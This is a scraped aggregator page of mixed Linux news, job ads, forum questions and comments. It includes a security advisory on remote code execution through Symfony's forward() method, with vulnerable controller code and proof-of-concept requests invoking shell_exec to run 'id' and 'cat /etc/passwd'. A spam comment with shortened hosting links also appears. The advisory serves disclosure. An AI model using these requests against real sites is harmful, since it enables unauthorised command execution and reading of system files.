          Re: Binary for Linux?      Cache   Translate Page      
Finally I close this question...
          Machine learning Python hacks, creepy Linux commands, Thelio, Podman, and more      Cache   Translate Page      
I'm filling in again for this weeks top 10 while  Rikki Endsley  is recovering from  LISA 18  held last week in Nashville, Tennessee. We're starting to gather articles for our 4 th annual Open Source ... - Source: opensource.com
          Un nuevo chip de Apple dificulta la instalación de Linux      Cache   Translate Page      
Tener un Mac y ejecutar Linux…No es la combinación más habitual, pero tampoco algo inaudito, el sr. Torvalds lo llevaba a la práctica hace unos años. En un futuro quizás sea más complicado: la compañía de la manzana ha diseñado un chip (T2) que previene
          Ikey Doherty cede Solus a la comunidad      Cache   Translate Page      
Vía Phoronix y tras una larga ausencia ha reaparecido Ikey Doherty, L’enfant terrible de GNU/Linux, creador de Solus y de su innovador escritorio Budgie. Mediante una amable carta nos ha confirmado que los rumores que circulaban sobre su desaparición habían sido algo exagerados…también la cesión
          Red Hat prescinde de KDE en RHEL      Cache   Translate Page      
La vorágine suscitada por la compra de Red Hat por parte de IBM, ha devorado el resto de noticias linuxeras de la semana. Incluso lanzamientos de la compañía del sombrero rojo como RHEL 7.6 o su pariente Fedora 29, han recibido menos atención de lo
          Manjaro planea deshacerse de pacman      Cache   Translate Page      
El gestor de paquetes pacman es una de las razones por las que muchos nos enamoramos de Arch Linux y de sus derivadas. Sencillo y veloz, tanto a la hora de instalar paquetes oficiales (en los comunitarios últimamente triunfan helpers tipo Yay o trizen) como
          Lenovo gana actualizaciones de firmware en Linux      Cache   Translate Page      
Lo ha confirmado el desarrollador Richard Hughes en su blog: Lenovo ha estado colaborando con la gente de GNOME y Red Hat para permitir la actualización de su firmware en el sistema del pingüino, mediante el servicio LVFS(Linux Vendor Firmware Service). De esta manera los
          Fantástica colección de imágenes linuxeras      Cache   Translate Page      
Para los amantes del artwork linuxero traemos hoy una completa colección de imágenes en alta resolución, creadas por un usuario que ha decidido compartir de forma altruista su trabajo, bajo la siempre permisiva licencia idgaf (i don’t give a f…). Las imágenes de temática open
          The Linux Foundation Announces Intent To Form New Foundation To Support GraphQL      Cache   Translate Page      


          Facebook's open-source license drama-zone GraphQL gets swanky digs in Linux mansion      Cache   Translate Page      

Modern data-fetching scheme could become industry standard

GraphQL, a query language for APIs that was on the verge of being shunned last year over software license concerns, has bounced back and landed in the arms of the Linux Foundation.…


          16-Way Graphics Card Comparison With Valve's Steam Play For Windows Games On Linux      Cache   Translate Page      
Phoronix: 16-Way Graphics Card Comparison With Valve's Steam Play For Windows Games On Linux While Steam Play is still of beta quality on Linux...
          Polaris 12 & Vega 12 Support Heading To The AMDKFD Compute Kernel Code      Cache   Translate Page      
Phoronix: Polaris 12 & Vega 12 Support Heading To The AMDKFD Compute Kernel Code With the Linux 4.20 merge window past, DRM developers are already...
          VMware Acquires Heptio, Mining Bitcoin Requires More Energy Than Mining Gold, Fedora Turns 15, Microsoft's New Linux Distros and ReactOS 0.4.10 Released      Cache   Translate Page      

News briefs for November 6, 2018.

VMware has acquired Heptio, which was founded by Joe Beda and Craig McLuckie, two of the creators of Kubernetes. TechCrunch reports that the terms of the deal aren't being disclosed and that "this is a signal of the big bet that VMware is taking on Kubernetes, and the belief that it will become an increasing cornerstone in how enterprises run their businesses." The post also notes that this acquisition is "also another endorsement of the ongoing rise of open source and its role in cloud architectures".

The energy needed to mine one dollar's worth of bitcoin is reported to be more than double the energy required to mine the same amount of gold, copper or platinum. The Guardian reports on recent research from the Oak Ridge Institute in Cincinnati, Ohio, that "one dollar's worth of bitcoin takes about 17 megajoules of energy to mine...compared with four, five and seven megajoules for copper, gold and platinum".

Happy 15th birthday to Fedora! Fifteen years ago today, November 6, 2003, Fedora Core 1 was released. See Fedora Magazine's post for a look back at the Fedora Project's beginnings.

Microsoft announced the availability of two new Linux distros for Windows Subsystem for Linux, which will coincide with the Windows 10 1809 release. ZDNet reports that the Debian-based Linux distribution WLinux is available from the Microsoft Store for $9.99 currently (normally it's $19.99). Also, OpenSUSE 15 and SLES 15 are now available from the Microsoft Store as well.

ReactOS 0.4.10 was released today. The main new feature is "ReactOS' ability to now boot from a BTRFS formatted drive". See the official ChangeLog for more details.


          Game Review: Lamplight City      Cache   Translate Page      
Lamplight City

A well lit look into Grundislav Games' latest release.

The universe of Lamplight City is rich, complex and oddly familiar. The game draws on that ever-popular theme of a steampunk alternative universe, adding dashes of Victorian squalor and just a pinch of 1950's detective tropes. Is it just a mishmash of clichés then? Yes, but it all works well together to form a likable and somewhat unique universe—like a cheesy movie, you can't help but fall in love with Lamplight City.

Figure 1. The Lamplight City Universe

Figure 2. Some Protesters

In Lamplight City, you play Miles Fordham, a disgraced detective turned PI following the death of his partner in Act I at the hands of a mysterious killer. Miles is accompanied by the ghostly voice of his partner Bill as a sort of schizophrenic inner monologue. It's creepy, and it's a perfect example of taking a classic trope and turning it into one of the game's biggest strengths. Bill's monologues add witty flavour to the dry protagonist and a way to explain details and scenarios to the player.

Figure 3. Miles Fordham's Schizophrenic Dialogue

Lamplight City features multiple cases that are all tied together with an overarching story. More impressively though is the overarching story's effect on the individual cases. In my play-through, mistakes I made in one case affected another and effectively led to another case becoming unsolvable. This is a system I instinctively hated. It seemed unjustly punitive to punish players for simply exploring dialogue options. Over time, however, as the music and art slowly enveloped me into a universe I truly enjoyed exploring and experiencing, I began to see how subtleties are at the center of this universe. What at first is dismissed as unimportant or underwhelming later appears as a subtle smack in the face, with that familiar feeling of "Oh, I knew I shouldn't have done that!"


          Kernel 4.20-rc1 Is Out, KDE Connect Android App 1.10 Released, Linux Mint 19.1 Coming Soon, Microsoft Ported ProcDump to Linux and Neptune Version 5.6 Now Available      Cache   Translate Page      

News briefs for November 5, 2018.

Linux kernel 4.20-rc1 is out. Linus writes, "This was a fairly big merge window, but it didn't break any records, just solid. And things look pretty regular, with about 70% of the patch is driver updates (gpu drivers are looming large as usual, but there's changes all over). The rest is arch updates (x86, arm64, arm, powerpc and the new C-SKY architecture), header files, networking, core mm and kernel, and tooling." See the LKML post for more information.

The KDE Connect Android app version 1.10 was released yesterday. Main changes include "mouse input now works with the same speed independent from the phones pixel density"; "the media controller now allows stopping playback"; the "run command supports triggering commands using kdeconnect:// URLs" and more. There are several desktop improvements as well, and the Linux Mobile App has also gained many new features.

The Linux Mint blog recently posted its upcoming release schedule. They are working on getting Linux Mint 19.1 out in time for Christmas, "with all three editions released at the same time and the upgrade paths open before the holiday season". In addition, Linux Mint is now on Patreon. See the post for all the changes and improvements in the works.

Microsoft ported the ProcDump applications to Linux and is planning to port ProcMon to Linux as well. According to ZDNet, "these ports are part of the company's larger plan to make the Sysinternals package available for Linux users in the coming future".

Neptune version 5.6 was released yesterday. This update of the desktop distro based fully on Debian 9.0 ("Stretch") provides kernel 4.18.6 with improved drivers and bugfixes. Other updates include systemd to version 239, KDE Applications to version 18.08.2, Network-Manager updated to 1.14, Plasma desktop has been updated to 5.12.7 and much more. See the full changelog here.


          MBW 635: Pizza to the Polls      Cache   Translate Page      

MacBreak Weekly (Audio)

  • Mac Mini 2018: look at all those ports!
  • MacBook Air 2018: a thoroughly ok laptop.
  • iPad Pro 2018: yeah, forget all about those two. This is where the real action is.
  • Apple's T2 security chip makes installing Linux harder.

Tips and Picks:

  • Leo's Pick: send free pizza to people waiting in line to vote.
  • Alex's Picks: Red Hydrogen One and SquadCast
  • Andy's Tip: back up your SSD!
  • Andy's Pick: Bringing Home The Birkin
  • Rene's Pick: Procreate for iPad

Hosts: Leo Laporte, Andy Ihnatko, Alex Lindsay, and Rene Ritchie

Download or subscribe to this show at https://twit.tv/shows/macbreak-weekly.

Sponsors:


          Projekt-Nr. 53369 - Security Engineer (w/m) - 3rd Level      Cache   Translate Page      
Aktuell sind wir auf der Suche nach einem Security Engineer (w/m) - 3rd Level).

Zu Ihren Aufgaben gehören:
+ Sicherstellung einer störungsfreien Infrastruktur
+ 3rd Level im Bereich Security und Bearbeitung von Service Requests
+ Fehleranalysen und Fehlerbehebungen
+ Frühzeitiges Erkennen von Fehlerzuständen (Monitoring und Event-Management)
+ Bewertung von Change-Requests hinsichtlich des gewünschten Effekts und der durch den Change entstehende Risiken
+ Planung und Bearbeitung von Changes und Konfigurationen
+ Dokumentation und Reporting

Anforderungen:
Must:
+ Cisco Security: CCNA oder CCNP Security Zertifizierung (Netzwerk, Routing, Switching ist was anderes)
+ Cisco Firewall Kenntnisse: CPSG 4800, Cisco ASA 5585, Cisco Firepower 4110, Cisco WSA S690 (Web Security Appliance)
+ Splunk/ Splunk Log Management (Security Monitoring Tool)
+ Tufin (Netzwerk Planungstool)
+ Palo Alto Firewall
+ Citrix Netscaler MPX (=Application Delivery Controller, ADC)
+ Linux mit Skriptingerfahrung (für Archiv & Desaster Recovery)
+ Sicheres Deutsch in Wort und Schrift

Nice:
+ Checkpoint
+ HP Service Center
+ Englischkenntnisse

Zusätzliche Informationen:
Konnten wir Ihr Interesse wecken? Dann freuen wir uns auf die Zusendung Ihres aussagekräftigen Qualifikationsprofils unter Angabe Ihrer Stundensatzvorstellung.

Projekt-Nr.:
53369

Stellentyp:
freiberuflich

Einsatzort:
D8, München

Start:
07.01.2019 / spätestens 01.02.2019

Dauer:
6-12 Monate +
          Projekt-Nr. 53349 - Oracle DB Experte (m/w)      Cache   Translate Page      
Aktuell sind wir auf der Suche nach einem Oracle DB Experten (m/w) für ein spannendes Projekt in der Retail-Branche.

Aufgaben:
+ Performance Analyse der Oracle Datenbanken und Statements
+ Erarbeiten von konkreten Lösungsvorschlägen und Maßnahmen
+ Durchführen und/ oder Überwachen der Maßnahmen
+ Erstellung des Performance Reviews

Anforderungen:
+ Langjährige Erfahrung mit Schwerpunkt Oracle und Performanceanalyse
+ Mehrere durchgeführte Performanceoptimierungen
+ Kenntnisse in der Nutzung und Einrichtung von üblichen Oracle Performance Tools
+ SQL Statement Optimierung
+ Verständnis von Zusammenhängen zwischen Datenbank und darunterliegender Infrastruktur
+ Erfahrung mit Datenbanksizing und idealem Datenbanksetup

Nice-to-have:
+ Erfahrung mit XML Datentypen
+ Linux
+ Java

Zusätzliche Informationen:
Konnten wir Ihr Interesse wecken? Dann freuen wir uns auf die Zusendung Ihres aussagekräftigen Qualifikationsprofils unter Angabe Ihrer Stundensatzvorstellung.

Projekt-Nr.:
53349

Stellentyp:
freiberuflich

Einsatzort:
D4

Start:
asap

Dauer:
10 Tage (80% Remote)
          #22 • All About AllJoyn w/ Philip DesAutels, PhD: Senior Director of IoT, The Linux Foundation      Cache   Translate Page      
If you follow the Internet of Things, you’ve surely heard of AllJoyn — the open-source IoT framework — and the AllSeen Alliance of 170+ member companies who’ve put their weight behind this important effort. Today we have a treat for you — a fun and interesting conversation about all things AllJoyn with Philip DesAutels, The Linux Foundation’s Senior […]
          Projekt-Nr. 53338 - PL SQL Entwickler (m/w)      Cache   Translate Page      
Für einen Kunden in Baden-Baden suchen wir derzeit einen PL SQL Entwickler (m/w).

Folgende Aufgaben werden Sie hierbei übernehmen:
+ PL/ SQL Programmierung
+ Datenmodell erstellen/ Artikelstammdaten
+ Normalisierung/ Transformierung
+ Implementierung
+ Testing selber durchführen, Echtdaten verifizieren, Sicherung auf Developmentsystem
+ Erstellung von Shell-Skripts) eher am Rande, lesen und schreiben
+ Schnittstellenprogrammierung/ Design

Anforderungen:
Must-have:
+ Oracle PL/SQL
+ DWH Kenntnisse

Nice-to-have:
+ Linux
+ Shell-Scripting

Zusätzliche Informationen:
Konnten wir Ihr Interesse wecken? Dann freuen wir uns auf die Zusendung Ihres aussagekräftigen Qualifikationsprofils unter Angabe Ihrer Stundensatzvorstellung.

Projekt-Nr.:
53338

Stellentyp:
freiberuflich

Einsatzort:
D7, Baden-Baden

Start:
asap

Dauer:
12 Monate +
          Introducing the GraphQL Foundation      Cache   Translate Page      

The Linux Foundation is essentially a foundation for foundations, and the newest member to join the ranks is the GraphQL Foundation. We’ve been tracking news and talking about GraphQL for some time now.

Back in 2012 Nick Schrock, Dan Schafer, and Lee Byron got together at Facebook to build the next generation of Facebook’s iOS app powered by a new API for News Feed — what they arrived at was the first version of GraphQL. Lee Byron has this to say about today’s announcement:

Today, GraphQL has been a community project longer than it was a Facebook internal project — which calls for its next evolution.

As one of GraphQL’s co-creators, I’ve been amazed and proud to see it grow in adoption since its open sourcing. Through the formation of the GraphQL Foundation, I hope to see GraphQL become industry standard by encouraging contributions from a broader group and creating a shared investment in vendor-neutral events, documentation, tools, and support.

So who’s involved? Well, GraphQL Foundation is being created in partnership with the Linux Foundation, Facebook, and nearly a dozen other companies. Those “other companies” are likely large scale companies who’ve contributed to or are using GraphQL in production and have a vested interest in its future.


          Linux Action News 78      Cache   Translate Page      
The new Fedora has a neat trick, The Register's KDE klickbait, and GhostBSD impresses. Plus Sailfish's release strategy gets refined, System76 announces their Thelio Linux hardware, and more.
          Linux Action News 77      Cache   Translate Page      
Linus is back in charge with the whole world watching, IBM is buying Red Hat, and Pine64 says they’re working on a Plasma phone. Plus Firefox has a new sales pitch for you, and how HTC's blockchain future is already fizzling out.
          Comment on Teetubes_019 // Controlled Burn by Conraddon      Cache   Translate Page      
Take advantage of a professional and innovative server hosting provider and of reliable and powerful dedicated servers based on Linux or Windows. Our dedicated root servers provide you with the latest server hardware, strong processors, unlimited traffic and the highest level of server availability, flexibility and efficiency. Get your own dedicated server for your individual business needs at prices you can afford or create your customized and individually configured server for your special requirements. DDoS protection included. <a href="https://goo.gl/yn9VLs" rel="nofollow">Server</a> Live support, 365 days a year! Via telephone (standard landline, no automated waiting loops) or e-mail, our employees are available 365 days a year to answer your questions and to assist you if you face any problems. <a href="https://goo.gl/yn9VLs" rel="nofollow">Vps</a> <a href="https://goo.gl/yn9VLs" rel="nofollow">VDS</a>
          I cannot access cookies from php pages only perl pages.      Cache   Translate Page      
I cannot access cookies from php pages only perl pages. No changes were made to any of the scripts. Possible things happened to the global server setting. (Budget: $10 - $30 USD, Jobs: Javascript, Linux, Perl, PHP, Software Architecture)
          Programmer Analyst - University of Wyoming Family Medicine Residency Program - Laramie, WY      Cache   Translate Page      
Javascript, NodeJS, PL/SQL and similar languages. Familiarity with Linux environment, javascript libraries, XML, JSON and SOAP or REST calls to web services.... $42,228 a year
From University of Wyoming Family Medicine Residency Program - Tue, 30 Oct 2018 18:54:17 GMT - View all Laramie, WY jobs
          Banner Developer - ITS - Careers | West Virginia University - Morgantown, WV      Cache   Translate Page      
This person will provide assist Senior Developers with application development support in an Oracle/Linux environment in SQL*PLUS, PL/SQL, SQL*Loader, Pro*C,...
From West Virginia University - Sun, 04 Nov 2018 10:05:52 GMT - View all Morgantown, WV jobs
          Commentaires sur Windows 10, Windows 7 va s’incliner, bilan par anonyme      Cache   Translate Page      
-et c'est bien regrettable que linux (ubuntu,debian,etc..) n'occupe que 1,38% du parc des PC-maintenant ce faible pourcentage s'explique aussi=déjà acheter un PC avec ubuntu pré installé !!!!et puis il y a quand même une façon de penser linux,qui est un peu plus geek que grand public (exemple;les paquets...) -maintenant que W10 supplante W7,quel exploit...c'est sûr la clio a aussi supplantée un jour la super5-non,ce qu'il faut retenir,c'est le temps (plus de 3 ans après son lancement) qu'il aura fallut à ce "fameux" W10 pour simplement égaler le toujours apprécié windows 7-là,ça se passe de commentaires
          Comment on How to Use Linux efibootmgr Command – 5 Examples by Douglas      Cache   Translate Page      
Could you help me? I was trying to get delete an obsolete input from Ubuntu on bios through efibootmgr. I ended up deleting the bios / uefi setup from my samsung laptop and I can not recover it. I typed the command sudo efibootmgr -b 0 -B ... (0 being the setup) .. any suggestions?
          Commentaires sur Windows 10, Son interface est de plus en plus incohérente par loulnux      Cache   Translate Page      
Si c'était si compliqué que ça ça se saurait, justement Linux offre un choix en matière d'interface. Rien n'empêchait Microsoft de faire évoluer W7 sans toucher à son apparence ou à peine histoire d'y ajouter le semblant d'ergonomie nécessaire au tactile.
          Commentaires sur Windows 10, Son interface est de plus en plus incohérente par Bruce      Cache   Translate Page      
Avant que les utilisateurs se perdent dans le labyrinthe Linux.. laissons cela aux ingénieurs ...........
          Commentaires sur Windows 10, Son interface est de plus en plus incohérente par anonyme      Cache   Translate Page      
s'il n'y avait que l'interface d'incohérent avec windows 10... maintenant l'hégémonie de MS sur les PC,ressort avec insistance depuis la sortie de windows 10,qui n'est pas un OS pensé pour les utilisateurs,mais pensé pour les services marketing de MS,un peu comme IOS. et puis il y a le cas linux et ses distributions,et effectivement il s'en faudrait de peu pour satisfaire tous les utilisateurs,mais là,ils leur manquent ce petit truc qui ferait la différence pour supplanter W10.
          Commentaires sur Windows 10, Windows 7 va s’incliner, bilan par loulnux      Cache   Translate Page      
""Si cette tendance se maintient, Windows 10 va devenir l’OS le plus utilisé au monde avant la fin de l’année."" Stricto sensu c'est totalement faux puisqu'Android représente plus du double et par conséquent Linux est de très très loi le tout premier.
          Cosmo Communicator — возвращение забытого форм-фактора      Cache   Translate Page      
Cosmo Communicator — возвращение забытого форм-фактора
На краудфандинговой площадке Indiegogo представлен проект мобильного устройства Cosmo Communicator, который возрождает в памяти знаменитые коммуникаторы линейки Nokia E90.
Новинка выполнена в форм-факторе мини-ноутбука с клавиатурой QWERTY. Но при этом она может работать и как мобильный телефон. Устройство функционирует на базе процессора MediaTek Helio P70, 6 ГБ ОЗУ и 128 ГБ флэш-памяти. Есть внутренний сенсорный экран Full HD+ диагональю 6 дюймов, внешний экран на 2 дюйма 570 х 240 пикселей, веб-камера на 5 МП и основная на 24 МП. Сканер отпечатка пальца позволяет не только разблокировать девайс, но также принять или отменить звонок.
Из коммуникаций имеются два порта USB-C, Wi-Fi 802.11ac, Bluetooth 4.2, FM-радио, поддержка 4G LTE, две SIM-карты, а также порт 3,5 мм. Есть и стереодинамики. Ёмкость батареи составляет 4220 мА·ч. В качестве ОС обещают Android, Debian, Sailfish OS и другие дистрибутивы Linux. Обещана и подсветка клавиатуры. 
На проект запрашивали 200 тысяч долларов, собрано уже более 454 тысяч, а впереди ещё месяц. По предзаказу такой коммуникатор будет стоить 550 долларов (чуть более 36 тысяч рублей), в рознице он появится за 800 долларов (почти 53 тысячи). Поставки начнутся в мае 2019 года.

          Red Hat Enterprise Linux künftig ohne KDE-Desktop      Cache   Translate Page      
Der KDE-Desktop – KDE Plasma 5, neben dem Desktop-Umgebung Gnome, gehören bei Linux seit Langem zusammen. Red Hat hat angekündigt, seine Linux Enterprise-Distribution künftig ohne einen KDE-Desktop auszuliefern. Red Had hat sich dazu entschlossen, künftig nur noch auf den GNOME-Desktop für die professionellen Linux-Umgebungen, zu setzten. Zwar war der Gnome-Desktop unter Red Hat Enterprise Linux […]
          SSD Advisory Symfony Framework forward() Remote Code Execution      Cache   Translate Page      

Vulnerability Summary

The following advisory describes a vulnerability found in Symfony 3.4 a php framework that is used to create websites and web applications. Built on top of the Symfony Components. Under certain conditions, the Symfony framework can be abused to trigger RCE in the HttpKernel (http-kernel) component, while forward() is considered by the vendor as an equivalent to eval() (in its security implications) there is no mentioning of this in the current documentation.

Vendor Response

“As previously noted, unless there is something we are missing, the forward() method itself does not have a security vulnerability, but you believe having public methods that accept callables as arguments is in itself a security vulnerability. The forward() method allows you to pass a callable to it which, like many methods in many libraries including many common functions in PHP core such as array_filter (https://secure.php.net/manual/en/function.array-filter.php), if you pass untrusted user input into it, then it could result in remote code execution.

As with SQL queries, outputting data onto a page, using callables or using eval(), if you pass untrusted user input into them, it can result in security issues whether it be remote code execution, SQL injection or an XSS issue. As a framework, Symfony will attempt to aid users to write more secure code and provide tools for this, but a framework cannot assume complete and total responsibility as developers can always write insecure code and should always be aware of how they use unvalidated user input.

As I hope I’ve explained we do not believe this to be a security vulnerability, but if you believe we are still missing something, please do let us know.”

We disagree with this assessment, looking up examples of how to use forward(), there is no mentioning by anyone that you should filter user provided data as it may trigger a code execution vulnerability (unlike eval() equivalent or SQL statements equivalent examples), we therefore believe its prudent to publicly announce this issue.

Credit

Independent security researcher, Calum Hutton, have reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

Affected systems

Symfony Framework 3.4.* Running on linux Systems.

Vulnerability Details

The vulnerability occurs when the untrusted user data is passed into the forward() function provided by the frameworks AbstractController class. If this function is called in application code with untrusted user input, the application is potentially at risk of this issue.

Symfony allows for controllers to be any PHP callable (https://symfony.com/doc/current/controller.html#a-simple-controller) which gives great flexibity to the developer, but also potentially unforeseen consequences. Because of this, the string ‘system’ would be considered a valid controller, as it is a valid callable and would resolve to the builtin system() function. Symfony would successfully resolve and instantiate the controller instance and attempt to resolve the arguments required to call the new controller from the provided arguments and request context. This would normally fail (depending on the names, and number of arguments), causing the entire controller resolution to fail. One array that is searched for appropriate argument names during argument resolution is the path array passed into the AbstractController::forward() function.

Hence, by controlling the first (controller name/callable) and at least partially the second (path array) parameters of the AbstractController::forward() function, it is possible to call arbitrary PHP functions leading to RCE.

How to Exploit

One way developers might introduce parameters into the path array to pass on to the forwarded controller is through named URL route parameters. Consider the following route definition:

forward:

path: /forward/{controller}/{cmd} defaults: { _controller: ‘AppControllerBaseController::myForward1’ }

Both the controller and cmd route parameters will be passed into the BaseController::myForward1 controller:

public function myForward1($controller, $cmd, array $path = array(), array $query = array()) { // Add the cmd var to the path array if ($cmd) { $path = compact(‘cmd’); } return $this->forward($controller, $path, $query); }

In this example route and controller, the cmd parameter is added to the path array (with the name cmd) that is passed into the AbstractController::forward() function. At this point, the controller is vulnerable to RCE with the below GET request: http://127.0.0.1/forward/shell_exec/id

By adding the cmd argument to the path array in the controller, and calling it cmd, Symfony will correctly resolve both the controller and arguments required for the shell_exec() PHP builtin function (http://php.net/manual/en/function.shell-exec.php). Once the controller and arguments are successfully resolved the controller is executed. Specifically in the above example URL, calling the Linux OS ‘id’ command. An alternative but still vulnerable route and controller combination is shown below, where URL query parameters from the request are merged into the path array and used in the AbstractController::forward() function.

forward:

path: /forward/{controller} defaults: { _controller: ‘AppControllerBaseController::myForward2’ } public function myForward2($controller, array $path = array(), array $query = array()) { // Get current request $req = App::getRequest(); // Populate path vars from query params $path = array_merge($path, $req->query->all()); return $this->forward($controller, $path, $query); }

With a configuration such as this, the same command could be run with the GET request:

http://127.0.0.1/forward2/shell_exec?cmd=id

PoC

With the following PHP page called ‘index.php’ located in the public symfony directory:

<?php use App Core App; use Symfony Component Debug Debug; use Symfony Component Dotenv Dotenv; use Symfony Component HttpFoundation Request; require __DIR__.‘/../vendor/autoload.php’; // The check is to ensure we don’t use .env in production if (!isset($_SERVER[‘APP_ENV’])) { if (!class_exists(Dotenv::class)) { throw new RuntimeException(‘APP_ENV environment variable is not defined. You need to define environment variables for configuration or add “symfony/dotenv” as a Composer dependency to load variables from a .env file.’); } (new Dotenv())->load(__DIR__.‘/../.env’); } if ($trustedProxies = $_SERVER[‘TRUSTED_PROXIES’] ?? false) { Request::setTrustedProxies(explode(‘,’, $trustedProxies), Request::HEADER_X_FORWARDED_ALL ^ Request::HEADER_X_FORWARDED_HOST); } if ($trustedHosts = $_SERVER[‘TRUSTED_HOSTS’] ?? false) { Request::setTrustedHosts(explode(‘,’, $trustedHosts)); } $env = $_SERVER[‘APP_ENV’] ?? ‘dev’; $debug = (bool) ($_SERVER[‘APP_DEBUG’] ?? (‘prod’ !== $env)); if ($debug) { umask(0000); Debug::enable(); } $app = new App($env, $debug); $request = App::getRequest(); $response = $app->handle($request); $response->send(); $app->terminate($request, $response);

We can issue a GET Request for the next URL:

http://localhost:8000/forward2/shell_exec?cmd=cat%20/etc/passwd

Result:


SSD Advisory   Symfony Framework forward() Remote Code Execution

          Form generation with Symfony 2&period;8 throws a Twig&lowbar;Error ...      Cache   Translate Page      

Since the last LTS version of Symfony was released few days ago (30.11.2015) I started playing with it. Unfortunately I can't generate a CRUD with write actions with the same code that works fine in Symfony 2.7.7.

First I create a new Symfony project using the bash under linux Mint 17.2:

symfony new tasks lts

The new directory tasks gets created with a new Symfony 2.8.0 project inside.

After adapting the database credentials in app/config/parameters.yml I create the database:

app/console doctrine:database:create

and generate a new bundle:

app/console generate:bundle --namespace=Acme/TasksBundle --format=yml

Then I create a new directory src/Acme/TasksBundle/Resources/config/doctrine and place two files for my models inside. These are:

Task.orm.yml

Acme\TasksBundle\Entity\Task: type: entity repositoryClass: Acme\TasksBundle\Repository\TaskRepository table: task id: id: type: integer generator: { strategy : AUTO } fields: description: type: text manyToMany: tags: targetEntity: Tag inversedBy: tasks cascade: [ "persist" ] joinTable: name: task_tag joinColumns: task_id: referencedColumnName: id inverseJoinColumns: tag_id: referencedColumnName: id

Tag.orm.yml

Acme\TasksBundle\Entity\Tag: type: entity repositoryClass: Acme\TasksBundle\Repository\TagRepository table: tag id: id: type: integer generator: { strategy : AUTO } fields: name: type: string length: 50 manyToMany: tasks: targetEntity: Task mappedBy: tags

The database schema should like this:

+----------------+ +--------------+ | task | | task_tag | +---------+ +----------------+ +--------------+ | tag | | id |<--->| task_id | +---------+ | description | | tag_id |<--->| id | +----------------+ +--------------+ | name | +---------+

Now I can generate the entities:

app/console generate:doctrine:entities AcmeTasksBundle

This works fine, so the database can be updated:

app/console doctrine:schema:update --force

Everything ok till now. The tables are in the database. Now I want to generate CRUD with write actions:

app/console generate:doctrine:crud --entity=AcmeTasksBundle:Task --with-write --format=yml

After confirming few questions it generates the CRUD and prints out:

Generating the CRUD code: OK

and afterwards throws this error:

[Twig_Error_Runtime] Key "tags" for array with keys "id, description" does not exist in "form/FormType.php.twig" at line 29

The controller gets created, but not the form.

Generating the CRUD without write options works fine. The very same code works flawlessly with Symfony 2.7.7.

I checked the differences in the file form/FormType.php.twig between the versions and here are the relevant parts:

Symfony 2.7.7

vendor/sensio/generator-bundle/Sensio/Bundle/GeneratorBundle/Resources/skeleton/form/FormType.php.twig

{%- if fields|length > 0 %} /** * @param FormBuilderInterface $builder * @param array $options */ public function buildForm(FormBuilderInterface $builder, array $options) { $builder {%- for field in fields %} ->add('{{ field }}') {%- endfor %} ; } {% endif %}

Symfony 2.8.0

vendor/sensio/generator-bundle/Resources/skeleton/form/FormType.php.twig

{%- if fields|length > 0 %} /** * @param FormBuilderInterface $builder * @param array $options */ public function buildForm(FormBuilderInterface $builder, array $options) { $builder {%- for field in fields -%} {%- if fields_mapping[field]['type'] in ['date', 'time', 'datetime'] %} ->add('{{ field }}', '{{ fields_mapping[field]['type'] }}') {%- else %} ->add('{{ field }}') {%- endif -%} {%- endfor %} ; } {% endif %} As I see the if condition in the for loop is the place where the error occurs. (I assume that the expression fields_mapping[field]['type'] causes the problem since the many to many field ( tag ) has no attribute type .)

What I am doing wrong? How can I solve this problem? Thank you very much for your help.

EDIT: The same problem occurs with Symfony 3.0.0. The file form/FormType.php.twig has been changed since version 2.8.

Looks like a regression after datetime fix in the generator bundle.

A quick solution is to revert to v2.* in your composer.json :

"sensio/generator-bundle": "^2.5",

The best solution is to fork the repo, fix the bug and create a pull request to contribute back to the community.

Since you already did all the job to isolate the bug, the fix is trivial: check if type exists in Resources/skeleton/form/FormType.php.twig . Something like

{%- if fields_mapping[field]['type'] is defined and fields_mapping[field]['type'] in ['date', 'time', 'datetime'] %}

unless the bug masks more hidden errors based on the same assumption.


          Sr ICT Beheerder Linux Storage      Cache   Translate Page      
Functieomschrijving / werkzaamheden: - het raadplegen van het werkzaamheden registratiesysteem; - het inhoudelijk beoordelen en interpreteren van aanvragen op proces, product, technische en logistieke aspecten; - het zo nodig inwinnen van nadere informatie; - het maken en registreren van nadere afspraken met klanten/gebruikers; - het controleren op volledigheid en werking van de te leveren ICT middelen; - het controleren of aan alle randvoorwaarden is voldaan; - het afstemmen van afwijkingen in de uitvoering; - het instrueren van gebruikers over de geleverde ICT middelen; - het bewaken en signaleren van de status van de ICT middelen en het proactief handelen hierop; - het nemen van preventieve en correctieve maatregelen; - het begeleiden van leveranciers - het uitvoeren van installatiewerkzaamheden...
          Linux Engineer      Cache   Translate Page      
Introductie: Voor een organisatie in de energiebranche ben ik op zoek naar een ervaren Freelance Linux Engineer. Organisatie: Deze organisatie speelt een belangrijke rol voor grote afnemers van stroom. Hierin bieden ze extra diensten en services aan als ‘slimme oplossingen’, dit zijn doorgaans innovatieve maar vooral groene manieren om aan stroom te komen...
          Программы для скриншотов Linux      Cache   Translate Page      

Когда я только начинал использовать Ubuntu вместо Windows в качестве основной системы, одной из первых вещей, которые меня беспокоили, было наличие инструментов для создания и редактирования скриншотов. Да, вы можете использовать стандартные комбинации клавиш, чтобы получить снимок экрана, но, используя сторонние инструменты, вы можете редактировать снимок. В этой статье мы представим вам программы и инструменты для создания снимков экрана. Эта статья соберёт в себе лучшие программы для скриншотов Linux. Программы для скриншотов Linux 1. Способ по умолчанию Вы хотите получить снимок всего экрана? Определённой области? Или только нужного окна? Если вы хотите получить обычный снимок экрана, без возможности описания или

Запись Программы для скриншотов Linux впервые появилась Losst.


          Cryptomator Cloud Storage Encryption Tool 1.4.0 Released With FUSE / Dokany Support      Cache   Translate Page      
Cryptomator, a free and open source, cross-platform client-side encryption tool for cloud files, was updated to version 1.4.0. With this release, Cryptomator can use FUSE on Linux and Mac, and Dokany on Windows, to provide the virtual, unencrypted drive, which should vastly improve the integration into the system.
          Red Hat - How An Open Source Software Company Became 34,000 Million Dollars Company      Cache   Translate Page      
In a historic milestone, Red Hat, the company that triumphed with Linux and open source has been acquired by IBM for 34,000 million dollars, the largest transaction in history for a software company.
          Need to hire a systems engineer / devops for ongoing work in Manila (BGC)      Cache   Translate Page      
Hi there, I am looking for a talented systems engineer to work effectively full-time in Manila (Bonifacio Global City). Looking for both senior engineering as well as top graduate from a university like UP Diliman... (Budget: $8 - $15 USD, Jobs: C# Programming, General Labor, Javascript, Linux, node.js, PHP, Puppet, Python, Software Architecture)
          Linux Touch Command      Cache   Translate Page      
